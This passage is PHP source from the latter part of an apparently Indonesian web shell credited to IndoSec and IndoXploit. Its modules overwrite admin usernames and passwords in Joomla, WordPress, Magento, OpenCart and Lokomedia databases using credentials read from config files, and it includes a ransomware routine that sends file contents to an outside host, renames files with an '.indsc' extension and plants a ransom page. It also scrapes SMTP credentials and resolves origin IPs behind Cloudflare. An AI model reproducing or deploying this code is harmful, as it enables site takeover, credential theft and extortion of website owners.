1936. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1937. echo "Config => ".$file_conf."<br>";
1938. echo "CMS => Joomla<br>";
1939. if($site == '') {
1940. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1941. } else {
1942. echo "Sitename => $site<br>";
1943. }
1944. if(!$update OR !$conn OR !$db) {
1945. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1946. } else {
1947. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
1948. }
1949. mysql_close($conn);
1950. } elseif(preg_match("/WordPress/",$config)) {
1951. $dbhost = ambilkata($config,"DB_HOST', '","'");
1952. $dbuser = ambilkata($config,"DB_USER', '","'");
1953. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1954. $dbname = ambilkata($config,"DB_NAME', '","'");
1955. $dbprefix = ambilkata($config,"table_prefix = '","'");
1956. $prefix = $dbprefix."users";
1957. $option = $dbprefix."options";
1958. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1959. $db = mysql_select_db($dbname);
1960. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1961. $result = mysql_fetch_array($q);
1962. $id = $result[ID];
1963. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1964. $result2 = mysql_fetch_array($q2);
1965. $target = $result2[option_value];
1966. if($target == '') {
1967. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
1968. } else {
1969. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1970. }
1971. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1972. echo "Config => ".$file_conf."<br>";
1973. echo "CMS => Wordpress<br>";
1974. echo $url_target;
1975. if(!$update OR !$conn OR !$db) {
1976. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1977. } else {
1978. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
1979. }
1980. mysql_close($conn);
1981. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1982. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1983. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1984. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1985. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1986. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1987. $prefix = $dbprefix."admin_user";
1988. $option = $dbprefix."core_config_data";
1989. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1990. $db = mysql_select_db($dbname);
1991. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1992. $result = mysql_fetch_array($q);
1993. $id = $result[user_id];
1994. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1995. $result2 = mysql_fetch_array($q2);
1996. $target = $result2[value];
1997. if($target == '') {
1998. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
1999. } else {
2000. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
2001. }
2002. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2003. echo "Config => ".$file_conf."<br>";
2004. echo "CMS => Magento<br>";
2005. echo $url_target;
2006. if(!$update OR !$conn OR !$db) {
2007. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2008. } else {
2009. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
2010. }
2011. mysql_close($conn);
2012. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
2013. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
2014. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
2015. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
2016. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
2017. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
2018. $prefix = $dbprefix."user";
2019. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2020. $db = mysql_select_db($dbname);
2021. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2022. $result = mysql_fetch_array($q);
2023. $id = $result[user_id];
2024. $target = ambilkata($config,"HTTP_SERVER', '","'");
2025. if($target == '') {
2026. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
2027. } else {
2028. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
2029. }
2030. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2031. echo "Config => ".$file_conf."<br>";
2032. echo "CMS => OpenCart<br>";
2033. echo $url_target;
2034. if(!$update OR !$conn OR !$db) {
2035. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2036. } else {
2037. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
2038. }
2039. mysql_close($conn);
2040. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
2041. $dbhost = ambilkata($config,'server = "','"');
2042. $dbuser = ambilkata($config,'username = "','"');
2043. $dbpass = ambilkata($config,'password = "','"');
2044. $dbname = ambilkata($config,'database = "','"');
2045. $prefix = "users";
2046. $option = "identitas";
2047. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2048. $db = mysql_select_db($dbname);
2049. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
2050. $result = mysql_fetch_array($q);
2051. $target = $result[alamat_website];
2052. if($target == '') {
2053. $target2 = $result[url];
2054. $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
2055. if($target2 == '') {
2056. $url_target2 = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
2057. } else {
2058. $cek_login3 = file_get_contents("$target2/adminweb/");
2059. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
2060. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
2061. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
2062. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
2063. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
2064. } else {
2065. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2066. }
2067. }
2068. } else {
2069. $cek_login = file_get_contents("$target/adminweb/");
2070. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
2071. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
2072. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
2073. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
2074. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
2075. } else {
2076. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2077. }
2078. }
2079. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
2080. echo "Config => ".$file_conf."<br>";
2081. echo "CMS => Lokomedia<br>";
2082. if(preg_match('/Error, Tidak dapat mengambil nama domainnya/', $url_target)) {
2083. echo $url_target2;
2084. } else {
2085. echo $url_target;
2086. }
2087. if(!$update OR !$conn OR !$db) {
2088. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2089. } else {
2090. echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
2091. }
2092. mysql_close($conn);
2093. }
2094. }
2095. }
2096. } else {
2097. echo "<h3 class='text-center mb-4'>Auto Edit User</h3>
2098. <form method='post'>
2099. <h5>Lokasi Dir Config</h5>
2100. <input type='text' class='form-control mb-3' name='config_dir' value='$dir'>
2101. <h5>Set User & Pass :</h5>
2102. <input type='text' name='user_baru' value='indosec' class='form-control mb-3' placeholder='Set Username'>
2103. <input type='text' name='pass_baru' value='indosec' class='form-control mb-4' placeholder='Set Password'>
2104. <input type='submit' name='hajar' value='Edit User' class='btn btn-danger btn-block'>
2105. </form>
2106. <p class='text-muted mb-4'>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</p>";
2107. }
2108. exit;
2109. }
2110.  
2111.  
2112. /*
2113. * Ransomware
2114. * IndoSec
2115. */
2116. if ($_GET['aksi'] == 'ransom') {
2117. if(isset($_POST["encrypt"])) {
2118. $dir = $_POST["path"];
2119. echo"<textarea class='form-control mb-4' rows='13' disabled=''>";
2120. function listFolderFiles($dir){
2121. if (is_dir($dir)) {
2122. $ffs = scandir($dir);
2123. unset($ffs[array_search('.', $ffs, true)]);
2124. unset($ffs[array_search('..', $ffs, true)]);
2125. if (count($ffs) < 1)
2126. return;
2127. foreach($ffs as $ff){
2128. $files = $dir."/".$ff;
2129. if(!is_dir($files)){
2130. /* encrypt file */
2131. $file = file_get_contents($files);
2132. $_a = base64_encode($file);
2133. /* proses curl */
2134. $ch = curl_init();
2135. curl_setopt($ch, CURLOPT_URL, 'http://encrypt.indsc.me/api.php?type=encrypt');
2136. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2137. curl_setopt($ch, CURLOPT_POSTFIELDS, "text=$_a");
2138. $x = json_decode(curl_exec($ch));
2139. if($x->status == 'success'){
2140. $_enc = base64_decode($x->data);
2141. rename($files, $files. ".indsc");
2142. echo "[+]$files => Success Encrypted\n";
2143. }
2144. }
2145. if(is_dir($dir.'/'.$ff)) listFolderFiles($dir.'/'.$ff);
2146. }
2147. $index = file_get_contents('https://pastebin.com/raw/aGZ6BeTH');
2148. $_o = fopen($dir."/index.html", "w");
2149. fwrite($_o, $index);
2150. fclose($_o);
2151. echo "\n[+] Done !";
2152. }else{
2153. echo "\nBukan dir";
2154. }
2155. }
2156. listFolderFiles($dir);
2157. echo "</textarea><br/>";
2158. }else{
2159. echo '<form method="post">
2160. <div class="form-group">
2161. <h4 class="text-center mb-4"><i class="fa fa-lock"></i> Ransomware</h4>
2162. <label>Pilih Directory :</label>
2163. <div class="form-group input-group">
2164. <div class="input-group-prepend">
2165. <div class="input-group-text"><i class="fa fa-home"></i></div>
2166. </div>
2167. <input type="text" name="path" class="form-control" value="'.$dir.'"/>
2168. </div>
2169. <input type="submit" name="encrypt" class="btn btn-danger btn-block" value="Encrypt"/>
2170. </div>
2171. </form>';
2172. }
2173. exit;
2174. }
2175.  
2176.  
2177. /*
2178. * SMTP Grabber
2179. * IndoXploit
2180. */
2181. if ($_GET['aksi'] == 'smtpgrab') {
2182. function scj($path) {
2183. $paths = scandir($path);
2184. foreach($paths as $pathb) {
2185. if(!is_file("$path/$pathb")) continue;
2186. $ambil = file_get_contents("$path/$pathb");
2187. $ambil = str_replace("$", "", $ambil);
2188. if(preg_match("/JConfig|joomla/", $ambil)) {
2189. $smtp_host = ambilkata($ambil,"smtphost = '","'");
2190. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
2191. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
2192. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
2193. $smtp_port = ambilkata($ambil,"smtpport = '","'");
2194. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
2195. echo "<table class='text-white table table-bordered'>
2196. <tr>
2197. <td>SMTP Host: $smtp_host</td>
2198. </tr>
2199. <tr>
2200. <td>SMTP Port: $smtp_port</td>
2201. </tr>
2202. <tr>
2203. <td>SMTP User: $smtp_user</td>
2204. </tr>
2205. <tr>
2206. <td>SMTP Pass: $smtp_pass</td>
2207. </tr>
2208. <tr>
2209. <td>SMTP Auth: $smtp_auth</td>
2210. </tr>
2211. <tr>
2212. <td>SMTP Secure: $smtp_secure</td>
2213. </tr>
2214. </table>";
2215. }
2216. }
2217. }
2218. echo "<p class='text-muted'>NB : Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/namafolder_config )</p>";
2219. $smtp = scj($path);
2220. exit;
2221. }
2222.  
2223.  
2224. /*
2225. * Bypass Cloud Flare
2226. */
2227. if ($_GET['aksi'] == 'bypascf') {
2228. echo '<form method="POST">
2229. <h5 class="text-center mb-3">Bypass Cloud Flare</h5>
2230. <div class="form-group input-group">
2231. <select class="form-control" name="idsPilih">
2232. <option>Pilih Metode</option>
2233. <option>ftp</option>
2234. <option>direct-conntect</option>
2235. <option>webmail</option>
2236. <option>cpanel</option>
2237. </select>
2238. </div>
2239. <div class="form-group input-group mb-4">
2240. <input class="form-control" type="text" name="target" placeholder="Masukan Url">
2241. <input class="btn btn-danger form-control" type="submit" value="Bypass">
2242. </div>
2243. </form>';
2244.  
2245. $target = $_POST['target'];
2246. if($_POST['idsPilih'] == "ftp") {
2247. $ftp = gethostbyname("ftp."."$target");
2248. echo "<p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
2249. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$ftp</font></p>";
2250. }
2251. if($_POST['idsPilih'] == "direct-conntect") {
2252. $direct = gethostbyname("direct-connect."."$target");
2253. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
2254. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$direct</font></p>";
2255. }
2256. if($_POST['idsPilih'] == "webmail") {
2257. $web = gethostbyname("webmail."."$target");
2258. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
2259. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$web</font></p>";
2260. }
2261. if($_POST['idsPilih'] == "cpanel") {
2262. $cpanel = gethostbyname("cpanel."."$target");
2263. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='3' color='#00ff00'>Correct
2264. ip is : </font><font face='Tahoma' size='3' color='#F68B1F'>$cpanel</font></p>";
2265. }
2266. exit;
2267. }
2268.  
2269.  
2270. /*
2271. * Zip Menu
2272. * IndoSec
2273. */
2274. if($_GET['aksi'] == 'zip_menu') {
2275. //Compress/Zip
2276. $exzip = basename($dir).'.zip';
2277. function Zip($source, $destination){
2278. if (extension_loaded('zip') === true){
2279. if (file_exists($source) === true){
2280. $zip = new ZipArchive();
2281. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true){
2282. $source = realpath($source);
2283. if (is_dir($source) === true){
2284. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
2285. foreach ($files as $file){
2286. $file = realpath($file);
2287. if (is_dir($file) === true){
2288. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
2289. }elseif(is_file($file) === true){
2290. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
2291. }
2292. }
2293. }elseif(is_file($source) === true){
2294. $zip->addFromString(basename($source), file_get_contents($source));
2295. }
2296. }
2297. return @$zip->close();
2298. }
2299. }
2300. return false;
2301. }
2302. //Extract/Unzip
2303. function Zip_Extrack($zip_files, $to_dir){
2304. $zip = new ZipArchive();
2305. $res = $zip->open($zip_files);
2306. if ($res === TRUE) {
2307. $name = basename($zip_files, ".zip")."_unzip";
2308. @mkdir($name);
2309. @$zip->extractTo($to_dir."/".$name);
2310. return @$zip->close();
2311. }else{
2312. return false;
2313. }
2314. }
2315.  
2316. echo '<div class="card card-body text-dark mb-4">
2317. <h4 class="text-center">Zip Menu</h3>
2318. <form enctype="multipart/form-data" method="post">
2319. <div class="form-group">
2320. <label>Zip File:</label>
2321. <div class="custom-file">
2322. <input type="file" name="zip_file" class="custom-file-input" id="customFile">
2323. <label class="custom-file-label" for="customFile">Choose file</label>
2324. </div>
2325. <input type="submit" name="upnun" class="btn btn-danger btn-block mt-3" value="Upload & Unzip"/>
2326. </div>
2327. </form>';
2328. if($_POST["upnun"]) {
2329. $filename = $_FILES["zip_file"]["name"];
2330. $tmp = $_FILES["zip_file"]["tmp_name"];
2331. if(move_uploaded_file($tmp, "$dir/$filename")){
2332. echo Zip_Extrack($filename, $dir);
2333. unlink($filename);
2334. $swa = "success";
2335. $text = "Berhasil Mengekstrak Zip";
2336. swall($swa,$text,$dir);
2337. } else {
2338. echo "<b>Gagal!</b>";
2339. }
2340. }
2341.  
2342. echo "<div class='row'><div class='col-md-6 mb-3'><h5>Zip Backup</h5>
2343. <form method='post'>
2344. <label>Folder</label>
2345. <input type='text' name='folder' class='form-control mb-3' value='$dir'>
2346. <input type='submit' name='backup' class='btn btn-danger btn-block' value='Backup!'>
2347. </form>";
2348. if($_POST['backup']){
2349. $fol = $_POST['folder'];
2350. if(Zip($fol, $_POST["folder"].'/'.$exzip)){
2351. $swa = "success";
2352. $text = "Berhasil Membuat Zip";
2353. swall($swa,$text,$dir);
2354. }else{
2355. echo "<b>Gagal!</b>";
2356. }
2357. }
2358.  
2359. echo "</div>
2360. <div class='col-md-6'><h5>Unzip Manual</h5>
2361. <form action='' method='post'>
2362. <label>Zip Location:</label>
2363. <input type='text' name='file_zip' class='form-control mb-3' value='$dir/$exzip'>
2364. <input type='submit' name='extrak' class='btn btn-danger btn-block' value='Unzip!'>
2365. </form>";
2366. if($_POST['extrak']){
2367. $zip = $_POST["file_zip"];
2368. if (Zip_Extrack($zip, $dir)){
2369. $swa = "success";
2370. $text = "Berhasil Mengekstrak Zip";
2371. swall($swa,$text,$dir);
2372. }else{
2373. echo "<b>Gagal!</b>";
2374. }
2375. }
2376. echo '</div></div></div>';
2377.  
2378. }
2379.  
2380. if(isset($_GET['path'])){
2381. $path = $_GET['path'];
2382. chdir($path);
2383. }else{
2384. $path = getcwd();
2385. }
2386. $path = str_replace('\\','/',$path);
2387. $paths = explode('/',$path);
2388. echo "Path : ";
2389. foreach($paths as $id=>$pat){
2390. if($pat == '' && $id == 0){
2391. $a = true;
2392. echo '<a href="?dir=/">/</a>';
2393. continue;
2394. }
2395. if($pat == '') continue;
2396. echo '<a style="word-wrap:break-word;" href="?dir=';
2397. for($i=0;$i<=$id;$i++){
2398. echo "$paths[$i]";
2399. if($i != $id) echo "/";
2400. }
2401. echo '">'.$pat.'</a>/';
2402. }
2403. $scandir = scandir($path);
2404. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
2405. echo '<div id="tab"><table class="text-white mt-1 table-hover table-responsive">
2406. <thead class="bg-info text-center">
2407. <th class="text-left">File/Folder</th>
2408. <th>Size</th>
2409. <th style="width:50%;">Last Modified</th>
2410. <th>Permission</th>
2411. <th>Action</th>
2412. </thead>';
2413.  
2414. foreach($scandir as $dir){
2415. $dtime = date("d/m/y G:i", filemtime("$dir/$dirx"));
2416. /* cek jika ini berbentuk folder */
2417. /* cek jika nama folder karaker terlalu panjang */
2418. if (strlen($dir) > 18) {
2419. $_dir = substr($dir, 0, 18)."...";
2420. }else{
2421. $_dir = $dir;
2422. }
2423. $_diir = $_dir;
2424. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
2425.  
2426. echo '<tr class="text-center">
2427. <td class="pinggir">'.$imgfol.' <a href="?dir='.$path.'/'.$dir.'">'.$_diir.'</a></td>
2428. <td>--</td>
2429. <td>
2430. '.$dtime.'
2431. </td>
2432. <td>
2433. <a href="?dir='.$path.'/'.$dir.'&aksi=chmod_dir">
2434. ';
2435. if(is_writable($path.'/'.$dir)) echo '<font color="#00ff00">';
2436. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
2437. echo perms($path.'/'.$dir);
2438. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></a></td>
2439. <td><a title="Rename" class="badge badge-success" href="?dir='.$path.'/'.$dir.'&aksi=rename_folder">&nbsp;<i class="fas fa-pen"></i>&nbsp;</a>&nbsp;&nbsp;<a title="Delete" class="badge badge-danger" href="?dir='.$path.'/'.$dir.'&aksi=hapus_folder">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>
2440. </td>';
2441. }
2442.  
2443. foreach($scandir as $file){
2444. $ftime = date("d/m/y G:i", filemtime("$path/$file"));
2445. /* cek jika ini berbentuk file */
2446. if(!is_file($path.'/'.$file)) continue;
2447. echo '<tr class="text-center">
2448. <td class="pinggir"><img src="';
2449.  
2450. /* set image berdasarkan extensi file */
2451. $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
2452. if($ext == "php") {
2453. echo 'https://image.flaticon.com/icons/png/128/337/337947.png"';
2454. }elseif ($ext == "html") {
2455. echo 'https://image.flaticon.com/icons/png/128/136/136528.png"';
2456. }elseif ($ext == "css") {
2457. echo 'https://image.flaticon.com/icons/png/128/136/136527.png"';
2458. }elseif ($ext == "png") {
2459. echo 'https://image.flaticon.com/icons/png/128/136/136523.png"';
2460. }elseif ($ext == "jpg") {
2461. echo 'https://image.flaticon.com/icons/png/128/136/136524.png"';
2462. }elseif ($ext == "jpeg") {
2463. echo 'http://i.imgur.com/e8mkvPf.png"';
2464. }elseif($ext == "zip") {
2465. echo 'https://image.flaticon.com/icons/png/128/136/136544.png"';
2466. }elseif ($ext == "js") {
2467. echo 'https://image.flaticon.com/icons/png/128/1126/1126856.png';
2468. }elseif ($ext == "ttf") {
2469. echo 'https://image.flaticon.com/icons/png/128/1126/1126892.png';
2470. }elseif ($ext == "otf") {
2471. echo 'https://image.flaticon.com/icons/png/128/1126/1126891.png';
2472. }elseif ($ext == "txt") {
2473. echo 'https://image.flaticon.com/icons/png/128/136/136538.png';
2474. }elseif ($ext == "ico") {
2475. echo 'https://image.flaticon.com/icons/png/128/1126/1126873.png';
2476. }elseif ($ext == "conf") {
2477. echo 'https://image.flaticon.com/icons/png/512/1573/1573301.png';
2478. }elseif ($ext == "htaccess") {
2479. echo 'https://image.flaticon.com/icons/png/128/1720/1720444.png';
2480. }elseif ($ext == "sh") {
2481. echo 'https://image.flaticon.com/icons/png/128/617/617535.png';
2482. }elseif ($ext == "py") {
2483. echo 'https://image.flaticon.com/icons/png/128/180/180867.png';
2484. }elseif ($ext == "indsc") {
2485. echo 'https://image.flaticon.com/icons/png/512/1265/1265511.png';
2486. }elseif ($ext == "sql") {
2487. echo 'https://img.icons8.com/ultraviolet/2x/data-configuration.png';
2488. }elseif ($ext == "pl") {
2489. echo 'http://i.imgur.com/PnmX8H9.png';
2490. }elseif ($ext == "pdf") {
2491. echo 'https://image.flaticon.com/icons/png/128/136/136522.png';
2492. }elseif ($ext == "mp4") {
2493. echo 'https://image.flaticon.com/icons/png/128/136/136545.png';
2494. }elseif ($ext == "mp3") {
2495. echo 'https://image.flaticon.com/icons/png/128/136/136548.png';
2496. }elseif ($ext == "git") {
2497. echo 'https://image.flaticon.com/icons/png/128/617/617509.png';
2498. }elseif ($ext == "md") {
2499. echo 'https://image.flaticon.com/icons/png/128/617/617520.png';
2500. }else{
2501. echo 'http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png';
2502. }
2503. echo '" class="ico2"></img>';
2504. /* cek jika karaker terlalu panjang */
2505. if (strlen($file) > 25) {
2506. $_file = substr($file, 0, 25)."...-.".$ext;
2507. }else{
2508. $_file = $file;
2509. }
2510. echo' <a href="?dir='.$path.'&aksi=view&file='.$path.'/'.$file.'">'.$_file.'</a></td>
2511. <td>'.formatSize(filesize($file)).'</td>
2512. <td>'.$ftime.'</td>
2513. <td><a href="?dir='.$path.'&aksi=chmod_file&file='.$path.'/'.$file.'" class="text-center">';
2514. if(is_writable($path.'/'.$file)) echo '<font color="#00ff00">';
2515. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
2516. echo perms($path.'/'.$file);
2517. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font></a></td>
2518. <td class="d-flex">
2519. <a title="Lihat" class="badge badge-info" href="?dir='.$path.'&aksi=view&file='.$path.'/'.$file.'">&nbsp;<i class="fa fa-eye"></i>&nbsp;</a>&nbsp;&nbsp;
2520. <a title="Edit" class="badge badge-success" href="?dir='.$path.'&aksi=edit&file='.$path.'/'.$file.'">&nbsp;<i class="far fa-edit"></i>&nbsp;</a>&nbsp;&nbsp;
2521. <a title="Rename" class="badge badge-success" href="?dir='.$path.'&aksi=rename&file='.$path.'/'.$file.'">&nbsp;<i class="fa fa-pencil"></i>&nbsp;</a>&nbsp;&nbsp;
2522. <a title="Delete" class="badge badge-danger" href="?dir='.$path.'&aksi=hapusf&file='.$path.'/'.$file.'" title="Delete">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>&nbsp;&nbsp;
2523. <a title="Download" class="badge badge-primary" href="?&dir='.$path.'&aksi=download&file='.$path.'/'.$file.'" title="Download">&nbsp;<i class="fa fa-download"></i>&nbsp;</a>
2524. </td>
2525. </tr>';
2526. }
2527. echo '</table></div></div></div><hr/>
2528. <center><a class="text-muted" href="https://local-hunter.com/">Copyright 2019 { IndoSec }</a></center><br/>';
2529. echo "<a href='#' class='scrollToTop'><i class='fa fa-arrow-up up' aria-hidden='true'></i></a>";
2530. /*
2531. End
2532. */
2533. ?>